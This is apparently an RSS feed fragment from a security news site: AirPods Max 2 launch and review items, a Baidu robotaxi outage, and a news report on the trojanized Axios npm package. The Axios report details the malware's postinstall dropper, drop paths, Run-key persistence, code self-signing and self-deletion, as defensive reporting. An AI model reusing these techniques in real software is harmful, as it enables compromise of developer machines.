<link>https://tsecurity.de/de/3400181/ios-mac-os/airpods-max-2-available-now-with-same-day-pickup-at-apple-stores/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3400181/ios-mac-os/airpods-max-2-available-now-with-same-day-pickup-at-apple-stores/</guid>
<pubDate>Wed, 01 Apr 2026 19:08:10 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has started selling AirPods Max 2 across Apple Store locations worldwide, and customers can now pick them up the same day or receive deliveries as shipments begin rolling out, which marks the official retail availability of the company’s latest premium over-ear headphones.



Apple’s website shows wide availability across regions, including same-day pickup at multiple Apple Store locations, which means buyers no longer need to wait for shipping windows and can get the headphones immediately, depending on local stock.



Upgrades with H2 chip and better audio



AirPods Max 2 runs on Apple’s H2 chip, which also powers AirPods Pro 2, and this upgrade brings up to 1.5 times stronger active noise cancellation along with improved sound clarity and smarter features like Adaptive Audio, Conversation Awareness, Voice Isolation, and Live Translation, all working together to improve everyday listening.



Apple also adds a high dynamic range amplifier that delivers cleaner audio output, while Spatial Audio playback sounds more refined and immersive, and users will also notice reduced wireless audio latency during playback.



A new Camera Remote feature lets users press the Digital Crown to take photos or control video recording on an iPhone or iPad, which adds a practical use case beyond audio.



AirPods Max 2 continues to offer up to 20 hours of battery life with active noise cancellation enabled, uses a USB-C port, and comes in Midnight, Starlight, Orange, Purple, and Blue, with pricing set at $549 in the U.S.]]></content:encoded>
</item>
<item>
<title><![CDATA[Amazon issues AirPods Max 2 price drop on launch day]]></title>
<description><![CDATA[Apple's new AirPods Max 2 over-ear headphones are in stock and on sale as retailers engage in a price war to compete for your business on launch day.Save on AirPods Max 2 on launch day - Image credit: AppleAirPods Max 2 officially launched today, and Amazon and Walmart are already competing for y...]]></description>
<link>https://tsecurity.de/de/3400109/ios-mac-os/amazon-issues-airpods-max-2-price-drop-on-launch-day/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3400109/ios-mac-os/amazon-issues-airpods-max-2-price-drop-on-launch-day/</guid>
<pubDate>Wed, 01 Apr 2026 18:36:35 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple's new AirPods Max 2 over-ear headphones are in stock and on sale as retailers engage in a price war to compete for your business on launch day.<br><br><div><img src="https://photos5.appleinsider.com/gallery/67222-141352-airpods-max-2-headphones-deal-xl.jpg" alt="Row of colorful AirPods Max 2 over-ear headphones forming an arch on a soft pastel gradient background, with a teal starburst label in the corner displaying the word NEW"><br><span>Save on AirPods Max 2 on launch day - Image credit: Apple</span></div><br>AirPods Max 2 officially launched today, and <a href="https://www.amazon.com/dp/B0GSS4SGZR/?th=1&amp;tag=apinsiderdeals-20" rel="nofollow" target="_blank">Amazon</a> and <a href="https://howl.link/p5ur12d3qzhyz" rel="nofollow" target="_blank">Walmart</a> are already competing for your business with a $20 discount on the Midnight color option.<br><br><ul><br><br><br> <a href="https://appleinsider.com/articles/26/04/01/amazon-issues-airpods-max-2-price-drop-on-launch-day?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/243907?urm_source=rss">Discuss on our Forums</a></ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Robotaxi Outage In China Leaves Passengers Stranded On Highways]]></title>
<description><![CDATA[An anonymous reader quotes a report from Wired: An unknown technical problem caused a number of robotaxis owned by the Chinese tech giant Baidu to freeze on Tuesday in the middle of traffic, trapping some passengers in the vehicles for more than an hour. In Wuhan, a city in central China where Ba...]]></description>
<link>https://tsecurity.de/de/3399879/it-security-nachrichten/robotaxi-outage-in-china-leaves-passengers-stranded-on-highways/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3399879/it-security-nachrichten/robotaxi-outage-in-china-leaves-passengers-stranded-on-highways/</guid>
<pubDate>Wed, 01 Apr 2026 17:22:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[An anonymous reader quotes a report from Wired: An unknown technical problem caused a number of robotaxis owned by the Chinese tech giant Baidu to freeze on Tuesday in the middle of traffic, trapping some passengers in the vehicles for more than an hour. In Wuhan, a city in central China where Baidu has deployed hundreds of its Apollo Go self-driving taxis, people on Chinese social media reported witnessing the cars suddenly malfunction and stop operating. Photos and videos shared online show the Baidu cars halted on busy highways, often in the fast lane.
 
[...] Local police in Wuhan issued a statement around midnight in China that said the situation was "likely caused by a system malfunction," but the incident is still under investigation. No one was injured, and all passengers have exited the vehicles, the police added. It's unclear how many of Baidu's robotaxis may have been impacted. [...] There were at least two other collisions on the same day, according to photos and videos posted on Chinese social media. A RedNote user in Wuhan confirmed to WIRED that she drove past a white minivan that had gotten into a rear-end collision with a parked robotaxi. The back of the Baidu car was badly damaged, but the two people standing beside the scene looked unharmed, she says. She added that she estimates she also saw at least a dozen more parked robotaxies.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Robotaxi+Outage+In+China+Leaves+Passengers+Stranded+On+Highways%3A+https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F04%2F01%2F064244%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F04%2F01%2F064244%2Frobotaxi-outage-in-china-leaves-passengers-stranded-on-highways%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/26/04/01/064244/robotaxi-outage-in-china-leaves-passengers-stranded-on-highways?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Attackers trojanize Axios HTTP library in highest-impact npm supply chain attack]]></title>
<description><![CDATA[Attackers compromised the npm account of the lead maintainer of Axios, a widely used JavaScript HTTP client library, and used it to publish malicious versions of the package that deployed a cross-platform remote access trojan on developer machines. The incident represents the highest-impact npm s...]]></description>
<link>https://tsecurity.de/de/3397448/it-security-nachrichten/attackers-trojanize-axios-http-library-in-highest-impact-npm-supply-chain-attack/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3397448/it-security-nachrichten/attackers-trojanize-axios-http-library-in-highest-impact-npm-supply-chain-attack/</guid>
<pubDate>Tue, 31 Mar 2026 22:52:00 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Attackers compromised the npm account of the lead maintainer of Axios, a widely used JavaScript HTTP client library, and used it to publish malicious versions of the package that deployed a cross-platform remote access trojan on developer machines. The incident represents the highest-impact npm supply chain attack on record given Axios’ approximately 100 million weekly downloads and its presence in frontend frameworks, backend services, and countless enterprise applications.</p>



<p>Luckily the trojanized versions, axios@1.14.1 and axios@0.30.4, were detected by multiple security companies monitoring the npm registry within minutes of publication, triggering a rapid response that saw the malicious packages removed by the npm team between two to three hours later. That said, given the high download activity this project sees, the short time window was enough to impact a significant number of developer environments.</p>



<p>According to cloud security firm Wiz, <a href="https://www.wiz.io/blog/axios-npm-compromised-in-supply-chain-attack">Axios is used in 80% of cloud and code environments</a>; the company observed execution of the malware in roughly 3% of impacted environments. Researchers with security firm Snyk noted that “even a two-hour malicious window represents an enormous potential blast radius” given the library’s popularity. Almost 175,000 other projects on npm list Axios as a dependency, meaning this had a huge cascade effect through the ecosystem.</p>



<p>The attack follows <a href="https://www.csoonline.com/article/4149938/trivy-supply-chain-breach-compromises-over-1000-saas-environments-lapsus-joins-the-extortion-wave.html">a series of supply chain attacks that impacted multiple open-source projects </a>across different package repositories over the past several weeks, most of them attributed to a group known as TeamPCP. However, the Google Threat Intelligence Group (GTIG) has attributed the Axios attack to a North Korean threat actor it tracks as UNC1069.<br><br>“North Korean hackers have deep experience with supply chain attacks, which they’ve historically used to steal cryptocurrency,” said John Hultquist, chief analyst with GTIG. “The full breadth of this incident is still unclear, but given the popularity of the compromised package, we expect it will have far reaching impacts.”</p>



<p>In their analysis, Snyk researchers also noted the sophistication of techniques involved in the attack.</p>



<p>“The attacker also showed meaningful operational sophistication, pre-staging the malicious dependency, using a ‘clean’ version history, double-obfuscating the dropper, building platform-specific RATs, and implementing anti-forensic self-deletion,” the Snyk researchers said in <a href="https://snyk.io/blog/axios-npm-package-compromised-supply-chain-attack-delivers-cross-platform/">their report</a>. “This was not opportunistic.”</p>



<h2 class="wp-block-heading">How the attack unfolded</h2>



<p>Attackers began preparing the Axios attack roughly 18 hours before when an account named nrwise published a package called plain-crypto-js@4.2.0. This was a clean decoy designed to establish registry history and legitimacy. The malicious payload arrived later the same day in plain-crypto-js@4.2.1, which contained a <code>postinstall</code> hook that would execute a dropper script when it was pulled in by a different package as a dependency.</p>



<p>Shortly after midnight UTC on March 31 a new version of the Axios package, axios@1.14.1, was published on npm followed by axios@0.30.4 39 minutes later. Both listed plain-crypto-js@4.2.1 as a dependency in their <code>package.json</code> files, but the rest of the components remained unchanged.</p>



<p>A package that appears in the manifest but has zero usage or imports in the codebase is called a phantom dependency and is a high-confidence indicator of compromise, <a href="https://www.stepsecurity.io/blog/axios-compromised-on-npm-malicious-versions-drop-remote-access-trojan">according to researchers at StepSecurity</a>. Another indicator was that these versions appeared only on npm and not in the project’s GitHub repo as tagged releases.</p>



<p>Axios’ legitimate 1.x releases were configured to use npm’s OIDC Trusted Publisher mechanism bound to GitHub Actions, but the 1.14.1 release was published manually via a stolen token with no corresponding commit or tag in the repository.</p>



<p><a href="https://github.com/axios/axios/issues/10604">In comments on GitHub</a>, the project’s principal maintainer Jason Saayman acknowledged that while v1.x had trusted publishing configured, the v0.x branch still relied on a legacy long-lived token. A community member further pointed out that the v1.x publish workflow still passed <code>NODE_AUTH_TOKEN</code> to npm, which takes precedence over OIDC when both are present, meaning the long-lived token was also being used for v1.x rather than the intended trusted publishing mechanism.</p>



<h2 class="wp-block-heading">Cross-platform malware</h2>



<p>The obfuscated and encrypted <code>postinstall</code> script contacted a command-and-control (C2) server on a domain registered the day before by the attackers and downloaded platform-specific second-stage RAT payloads.</p>



<p>On macOS, the binary is written to <code>/Library/Caches/com.apple.act.mond</code> and can self-sign injected payloads via <code>codesign —force —deep —sign</code>, bypassing macOS Gatekeeper protections. The malware fingerprints the system, collects hostname, username, macOS version, boot and install times, CPU architecture, and running processes, and then reaches out to the C2 server every 60 seconds.</p>



<p>On Windows machines the payload is a PowerShell script copied to <code>%PROGRAMDATA%\wt.exe</code>, masquerading as Windows Terminal. The malware establishes persistence through a registry Run key named “MicrosoftUpdate” and a re-download batch file. Meanwhile Linux systems receive a Python script stored as <code>/tmp/ld.py</code> that gets executed via <code>nohup python3</code>.</p>



<p>The RAT supports four commands: <code>peinject</code> for deploying additional binaries, <code>runscript</code> for executing shell or AppleScript code, <code>rundir</code> for directory enumeration, and <code>kill</code> for self-termination.</p>



<p><a href="https://socket.dev/blog/axios-npm-package-compromised">According to researchers from security firm Socket</a>, after execution the malware attempts to erase its tracks by deleting <code>setup.js</code>, removing the malicious <code>package.json</code> that contained the postinstall hook and replacing it with a clean copy that reports version 4.2.0 instead of 4.2.1. This means users running <code>npm list</code> in an affected project directory will see plain-crypto-js@4.2.0, potentially misleading them into believing the installed version predates the attack.</p>



<h2 class="wp-block-heading">Detection and maintainer response</h2>



<p>Security firms monitoring npm flagged plain-crypto-js@4.2.1 within minutes after it was published, triggering a series of responses, including by the npm registry team that removed the packages. However, the Axios project itself had difficulty containing the issue because the incident happened during the lead maintainer’s nighttime.</p>



<p>A core collaborator of the project responded to the community-reported issue on GitHub also within minutes, but his permissions were lower than those of the maintainer whose token was compromised.</p>



<p>This underscores a potential incident response gap open-source projects might face, because even if project contributors notice a breach immediately, the attacker could have higher privileges than them through a stolen token and could slow down attempts at damage control.</p>



<p>In <a href="https://www.csoonline.com/article/4149938/trivy-supply-chain-breach-compromises-over-1000-saas-environments-lapsus-joins-the-extortion-wave.html">the recent Trivy compromise</a>, attackers flooded the GitHub issue with spam comments from bots to make it harder for maintainers to respond and communicate with the community.</p>



<h2 class="wp-block-heading">Prepare for more compromises</h2>



<p>The cascade effect of the Axios incident became visible as dependency scanning tools flagged hundreds of downstream projects that had pulled the malicious versions. One user posted warnings to more than 50 repositories after detecting plain-crypto-js in their lockfiles, while another identified dozens more, from personal blogs to enterprise apps.</p>



<p>This demonstrates how quickly the compromise of a popular npm package propagates through the ecosystem, even if the breach is detected within a few hours.</p>



<p>Organizations should audit lockfiles and installed dependencies for the malicious versions immediately. If the malicious versions were installed, assume the development environments are fully compromised. Security teams should isolate affected systems, rotate all credentials present on them such as npm tokens, cloud provider keys, SSH private keys, CI/CD secrets, etc.</p>



<p>“Do not rotate in place; revoke and reissue,” the Snyk researchers advised. “Do not attempt to clean compromised systems. Rebuild from a known-clean snapshot.”</p>



<p>In the long term, organizations should enforce <code>npm ci —ignore-scripts</code> in CI/CD pipelines to prevent <code>postinstall</code> hooks from executing during automated builds and consider package age policies such as <a href="https://socket.dev/blog/npm-introduces-minimumreleaseage-and-bulk-oidc-configuration">npm’s minimumReleaseAge setting</a>. This gives development teams the ability to block the installation of packages that don’t have a minimum age, which would have blocked this attack since “plain-crypto-js” existed for less than 24 hours before being pulled into Axios’ dependency tree.</p>



<p>The use of AI tools like Claude Code or OpenAI Codex in enterprise environments via their respective desktop apps extend the impact past developer environments. These tools are increasingly being used by non-developers in their work workflows, and LLMs tend to rely heavily on the npm and PyPI ecosystems for CLI tools.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple AirPods Max 2 review: Better late than never]]></title>
<description><![CDATA[I’m honestly shocked the AirPods Max 2 even exists. After Apple only added a USB-C port and a few new colors to its over-ear headphones in 2024, I thought it had given up on delivering a proper upgrade to its priciest AirPods model. I’m happy to report that wasn’t the case.  
The AirPods Max 2 is...]]></description>
<link>https://tsecurity.de/de/3396226/it-nachrichten/apple-airpods-max-2-review-better-late-than-never/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3396226/it-nachrichten/apple-airpods-max-2-review-better-late-than-never/</guid>
<pubDate>Tue, 31 Mar 2026 15:17:49 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>I’m honestly shocked the AirPods Max 2 even exists. After Apple <a target="_blank" class="link" href="https://www.engadget.com/audio/headphones/apple-refreshes-its-airpods-max-with-new-colors-and-usb-c-174330979.html" data-i13n="cpos:1;pos:1">only added</a> a USB-C port and a few new colors to its over-ear headphones in 2024, I thought it had given up on delivering a proper upgrade to <a target="_blank" class="link" href="https://www.engadget.com/airpods-max-review-143019326-143034684.html" data-i13n="cpos:2;pos:1">its priciest AirPods model</a>. I’m happy to report that wasn’t the case.  </p>
<p><a target="_blank" class="link" href="https://www.engadget.com/audio/headphones/apple-announces-the-airpods-max-2-with-improved-noise-cancelation-and-h2-chip-133319594.html" data-i13n="cpos:3;pos:1">The AirPods Max 2</a> is certainly an updated version of Apple’s headphones, but the company is also catching it up to <a target="_blank" class="link" href="https://www.engadget.com/audio/headphones/airpods-pro-3-review-a-significant-update-to-apples-best-earbuds-120028170.html" data-i13n="cpos:4;pos:1">the AirPods Pro 3</a>. The headphones now carry the company’s powerful H2 audio chip, the component that enables features like Adaptive Audio and Live Translation. The USB-C AirPods Max may have barely been an update, but the AirPods Max 2 is worthy of the new numeral in its name. The price is still $549, due in part to the fact that Apple’s products <a target="_blank" class="link" href="https://www.bloomberg.com/news/articles/2025-04-12/trump-exempts-phones-computers-chips-from-reciprocal-tariffs" data-i13n="cpos:5;pos:1">are exempt</a> from Trump’s tariffs, yet these remain some of the most expensive headphones I’ve reviewed. Are the AirPods Max still worth it?</p>
<p>
 <core-commerce data-type="product-list" data-original-url="https://www.apple.com/shop/buy-airpods/airpods-max-2/starlight"></core-commerce></p>
<h2>What’s new on the AirPods Max 2?</h2>
<p>All of the AirPods Max 2’s major new features are here thanks to the upgrade to the H2 chip. It was baffling that Apple didn’t swap out the H1 when it made the switch to USB-C, choosing instead to saddle its pricey headphones with very outdated silicon for another 16 months. So, in a lot of ways, the AirPods Max 2 is a lot more about getting up to date with the rest of the lineup, which means a host of new tools await. </p>
<p>Thanks to the H2 chip, the AirPods Max 2 has Adaptive Audio, Conversation Awareness, Voice Isolation, Personalized Volume, Siri Interactions (head gestures) and Live Translation. Adaptive Audio blends active noise cancellation (ANC) with transparency mode and automatically adjusts the mix based on your surroundings. Conversation Awareness can tell when you’re talking and automatically lowers the volume and enables transparency mode for quick chats.  </p>
<p>Voice Isolation helps improve your voice quality for calls when the AirPods Max 2 is used with compatible apps on an iPhone, iPad or Mac, and I think we’re all well-aware of what <a target="_blank" class="link" href="https://www.engadget.com/audio/headphones/how-to-use-live-translation-with-airpods-144837882.html" data-i13n="cpos:6;pos:1">Live Translation</a> is. Lastly, Personalized Volume takes notes on your listening preferences over time and applies automatic adjustments based on those and your surroundings. </p>
<p>Unsurprisingly, these features all work as well as they do on the AirPods Pro 3. Of course, there will be some that you use often and others that you might not touch at all. For me, I don’t like contending with unwanted volume changes due to Conversation Awareness, so I turn that one off. It’s not as easily triggered as Sony’s version, but I did trick it with an unexpectedly loud burp. I also don’t use the Siri head gestures, although they work very well. I frequently use Adaptive Audio around the house, which allows me to enable transparency mode to hear what I need to while letting the headphones apply ANC if I encounter unwanted noise. Voice Isolation is also a big improvement to normal voice performance and Live Translation is certainly nice to have.  </p>
<p>Two additional H2 features that I do use often on the AirPods Pro, and will do so on the AirPods Max 2 because they work well here, are studio-quality audio recording and Camera Remote. The first is self-explanatory, but it does offer a boost to clips recorded in Voice Memos and the Camera app (my main two uses). Meanwhile, Camera Remote allows you to use the Digital Crown to take a photo or start/stop a video recording without reaching for your iPhone. </p>
<h2>Et tu, hearing health?</h2>
<figure>
 <img src="https://d29szjachogqwa.cloudfront.net/images/user-uploaded/dsc_6099_5947.jpg" data-crop-orig-src="https://d29szjachogqwa.cloudfront.net/images/user-uploaded/dsc_6099_5947.jpg" alt="The fabric ear pads on the AirPods Max 2" data-uuid="8ad8721c-0c86-42be-9a27-590fc0216fc4">
 <figcaption>
  The fabric ear pads on the AirPods Max 2
 </figcaption>
 <div class="photo-credit">
  Billy Steele for Engadget
 </div>
</figure>
<p>Apple’s <a target="_blank" class="link" href="https://www.engadget.com/audio/headphones/apples-airpods-pro-hearing-health-tools-could-normalize-wearing-earbuds-everywhere-140054858.html" data-i13n="cpos:7;pos:1">hearing health features</a> are some of the most important tools on the AirPods Pro. However, you won’t find them on the AirPods Max 2, despite the new H2 chip. While the headphones do offer loud sound reduction, the <a target="_blank" class="link" href="https://www.engadget.com/audio/headphones/how-to-take-apples-hearing-test-with-the-airpods-pro-2-173014978.html" data-i13n="cpos:8;pos:1">hearing test</a>, <a target="_blank" class="link" href="https://www.engadget.com/audio/headphones/how-to-use-apples-airpods-pro-2-as-a-hearing-aid-173049967.html" data-i13n="cpos:9;pos:1">hearing aid</a> and automatic conversation boost tools are absent. There are several reasons for this, the primary one being that the cushions on the over-ear headphones don’t seal off your ears the way the AirPods Pro ear tips do.</p>
<p>Still, loud sound reduction isn’t nothing. This prevents exposure to loud ambient noise while making adjustments to keep the audio sounding good. It’s particularly useful when you encounter blaring construction sounds during a commute or similar inconveniences. </p>
<h2>Design: More of the same</h2>
<figure>
 <img src="https://d29szjachogqwa.cloudfront.net/images/user-uploaded/dsc_6063_9300.jpg" data-crop-orig-src="https://d29szjachogqwa.cloudfront.net/images/user-uploaded/dsc_6063_9300.jpg" alt="The Digital Crown and the listening mode control on the AirPods Max 2" data-uuid="ccf78a8d-ccdd-4066-be57-78a8cabf05c6">
 <figcaption>
  The Digital Crown and the listening mode control on the AirPods Max 2
 </figcaption>
 <div class="photo-credit">
  Billy Steele for Engadget
 </div>
</figure>
<p>One thing that hasn’t changed on the AirPods Max 2 is the design. For better or worse, Apple has kept the same look that it debuted in 2020. Aside from new colors and the switch from Lightning to USB-C in 2024, there are no other visible differences between this version and the original. I would argue it’s time for the company to change things up, but I can also understand why it hasn’t. </p>
<p>First, let’s discuss what’s great about the AirPods Max’s design. It’s unique, especially the mesh headband, solid aluminum ear cups and fabric ear pads. The punches of color are nice too, and if you prefer something more subtle, the black and gold, er… Midnight and Starlight options fit that bill. From the start, I’ve loved the simple controls that are comprised of the Apple Watch’s Digital Crown and the lone additional button for listening modes (a press and hold will activate Live Translation). The controls are in a great location, and it’s so satisfying to spin the Digital Crown for volume adjustments. </p>
<p>So, why hasn’t Apple redesigned the outside of the AirPods Max? I’d argue it doesn’t think it needs to yet. The AirPods Pro is still largely the same as it has been from the first version, and the regular AirPods only got its <a target="_blank" class="link" href="https://www.engadget.com/audio/headphones/apple-airpods-4-review-pro-features-for-everyone-120032046.html" data-i13n="cpos:10;pos:1">first big design overhaul</a> in 2024. The original AirPods debuted in 2016, so if Apple keeps a similar timeline for aesthetic changes to both the Pro and Max lines, we might not see those until 2027 and 2028 respectively. </p>
<h2>Sound quality, ANC and calls</h2>
<figure>
 <img src="https://d29szjachogqwa.cloudfront.net/images/user-uploaded/dsc_6044_8765.jpg" data-crop-orig-src="https://d29szjachogqwa.cloudfront.net/images/user-uploaded/dsc_6044_8765.jpg" alt="Like before, the ear pads are replaceable on the AirPods Max 2" data-uuid="93e5c60d-e212-40ca-b84a-3b2e21662d38">
 <figcaption>
  Like before, the ear pads are replaceable on the AirPods Max 2
 </figcaption>
 <div class="photo-credit">
  Billy Steele for Engadget
 </div>
</figure>
<p>Besides the H2 chip, the other big upgrade to the AirPods Max’s internal components is a new high dynamic range amplifier. This improves overall sound quality by allowing you to listen at higher volumes with low distortion and excellent clarity. Apple also overhauled the digital signal processing (DSP) for better bass response and to enhance the locations of instruments in the mix. </p>
<p>Those tweaks don’t equate to a huge leap in audio performance on the AirPods Max 2, but the gains are noticeable. Sound quality wasn’t an issue before, but you can definitely hear the improved instrument localization and enhanced bass performance across nearly all genres. On Ruston Kelly’s “Waiting to Love You (Piano Version/Live From Salt Lick Sessions),” the singer’s unique voice and the keys completely fill your head. It’s like a barrage of balladry in the best way. You get the texture of the vocals, the reverb of the piano and all the dynamics of the stripped-down live performance. </p>
<p>Jump to something a bit more energetic, like aya’s “navel gazer,” and the AirPods Max 2 deftly manages the vocals, synths and whatever else is happening in the mix (seriously, it’s a lot). And there’s still the sonic deluge that <em>hexed! </em>hits you with. Even with the multi-genre mash-up metal of Bilmuri, these headphones keep the vocals, guitars, drums and subtle sounds separate. There are a lot of delicate details in the artist’s latest tracks — like “More Than Hate,” for example — and the AirPods Max 2 ensures you’ll catch them all. A screeching eagle? Hell yeah, brother. </p>
<p>While wireless listening remains excellent, the AirPods Max 2 still offers lossless audio over USB-C. If you opt for wired use, you can get up to 24-bit/48kHz quality from compatible streaming services or locally stored files. This is the same functionality that <a target="_blank" class="link" href="https://www.engadget.com/audio/headphones/how-to-use-lossless-audio-on-the-airpods-max-180026218.html" data-i13n="cpos:11;pos:1">Apple delivered in 2025</a>. As expected, it still works well and provides enhanced listening when needed. Personally, I like to use it when I’m sitting at my desk. What’s more, the wired USB-C connection can be used for low-latency audio — which is great when you’re playing a game or mixing/editing audio projects. I should note the rest of the AirPods Max features (Siri, Adaptive Audio, etc.) still work over Bluetooth in wired mode, and there’s also a low-latency Game Mode for wireless use with a Mac, iPhone or iPad. </p>
<p>In terms of ANC, Apple says the H2 unlocks up to 1.5x stronger performance than the previous generation. The company combined the audio chip with new computational audio algorithms to reduce more external sounds — like airplane engines, trains and the roar of a coffee shop. That difference is certainly noticeable, as I found constant sources of noise around my house (fans, white noise machines, HVAC system, etc.) were much less apparent when I had the AirPods Max 2 on. Plus, Adaptive Audio uses the ANC system to pick up any changes and make the necessary adjustments to keep your music, podcast or movie coming through clearly.</p>
<p>Every AirPods model that has ANC is also equipped with transparency mode. Since the debut of the first AirPods Pro, I’ve been continually amazed by the natural sound of this feature. No other audio company comes close to matching the clarity of the ambient sound here, nearly making you forget you're wearing earbuds or headphones. This has a tremendous impact on calls, as you can hear yourself very well, so you never feel the need to speak loudly. Plus, Voice Isolation combines the AirPods Max 2’s H2 chip with an iPhone, iPad or Mac to further improve your voice and reduce background noise. Most headphones offer average voice performance at best, but like it has in the past, Apple actually delivers. </p>
<h2>Battery life</h2>
<figure>
 <img src="https://d29szjachogqwa.cloudfront.net/images/user-uploaded/dsc_6040_8139.jpg" data-crop-orig-src="https://d29szjachogqwa.cloudfront.net/images/user-uploaded/dsc_6040_8139.jpg" alt='The Smart Case puts the AirPods Max 2 in an "ultra-low-power state"' data-uuid="a4df5846-43ca-4f79-a7ea-d0f6bf13c0f8">
 <figcaption>
  The Smart Case puts the AirPods Max 2 in an "ultra-low-power state"
 </figcaption>
 <div class="photo-credit">
  Billy Steele for Engadget
 </div>
</figure>
<p>One of the areas I was hoping for an additional boost on the AirPods Max 2 is battery life. Sadly, I was headed for disappointment. This model offers the same 20-hour longevity as its predecessors, a figure that includes ANC and/or Spatial Audio. While it’s certainly enough to get you through a couple of work days or a trans-Atlantic flight, that number falls well short of the 30-50 hours much of the over-ear competition can muster these days. </p>
<p>I haven’t had the AirPods Max 2 long enough to do a full battery test; I chose to focus on the new features instead. However, based on the performance that I’ve seen so far, I have no reason to doubt Apple’s claims here. The company has a solid track record on battery life, and all indications are that it continues on the AirPods Max 2. I’ll update this review when this test is complete. </p>
<h2>The competition</h2>
<figure>
 <img src="https://d29szjachogqwa.cloudfront.net/images/user-uploaded/dsc_6054_5396.jpg" data-crop-orig-src="https://d29szjachogqwa.cloudfront.net/images/user-uploaded/dsc_6054_5396.jpg" alt="The AirPods Max 2's mesh headband" data-uuid="accca421-1b58-48d7-aa3c-02c01e5d8367">
 <figcaption>
  The AirPods Max 2's mesh headband
 </figcaption>
 <div class="photo-credit">
  Billy Steele for Engadget
 </div>
</figure>
<p>If you’re thoroughly invested in Apple’s ecosystem, the AirPods Max 2 is worth considering. Most of the features are reserved for the iOS, iPadOS and masOS faithful, so it doesn’t really make sense for Android users or Windows devotees to splurge on the $549 headphones. If you’re still balking at that price tag, <a target="_blank" class="link" href="https://www.engadget.com/audio/headphones/apple-refreshes-its-airpods-max-with-new-colors-and-usb-c-174330979.html" data-i13n="cpos:12;pos:1">Sony’s WH-1000XM6</a> is my current top pick on our <a target="_blank" class="link" href="https://www.engadget.com/audio/headphones/best-headphones-wireless-bluetooth-120543205.html" data-i13n="cpos:13;pos:1">best headphones list</a>. While those headphones are $460 at full price, you can currently find them for $400. Sony continues to mix great sound with capable ANC and a list of features few rivals can compete with. Plus, those handy tools are available to both iOS and Android users. </p>
<p><a target="_blank" class="link" href="https://www.engadget.com/audio/headphones/bose-quietcomfort-ultra-headphones-2nd-gen-review-impactful-upgrades-to-a-familiar-formula-150000709.html" data-i13n="cpos:14;pos:1">Bose’s second-gen QuietComfort Ultra headphones</a> are another solid option. They offer powerful ANC, great sound quality and excellent comfort for $449, but you can currently snag them for around $400. If noise cancellation performance is your primary concern, this is your pick. Lastly, if money is no object, a personal favorite is the <a target="_blank" class="link" href="https://www.engadget.com/audio/headphones/bowers--wilkins-px8-s2-review-headphone-extravagance-193000794.html" data-i13n="cpos:15;pos:1">Px8 S2 from Bowers &amp; Wilkins</a>. They’re pure luxury right down to the $799 price tag, and they exude grandeur. The company’s combo of leather and aluminum screams high end and it made some design tweaks for this model to refresh the overall look. Battery life and sound quality are the big attractions here, but just know you’ll have to forgo the advanced features much of the (more affordable) competition provides — like all of those H2-powered tools on the AirPods Max 2. </p>
<h2>Wrap-up</h2>
<figure>
 <img src="https://d29szjachogqwa.cloudfront.net/images/user-uploaded/dsc_6085_5301.jpg" data-crop-orig-src="https://d29szjachogqwa.cloudfront.net/images/user-uploaded/dsc_6085_5301.jpg" alt="Apple AirPods Max 2 and the Smart Case" data-uuid="bc2a009c-5337-40ad-af00-bf73b93a9ed2">
 <figcaption>
  Apple AirPods Max 2 and the Smart Case
 </figcaption>
 <div class="photo-credit">
  Billy Steele for Engadget
 </div>
</figure>
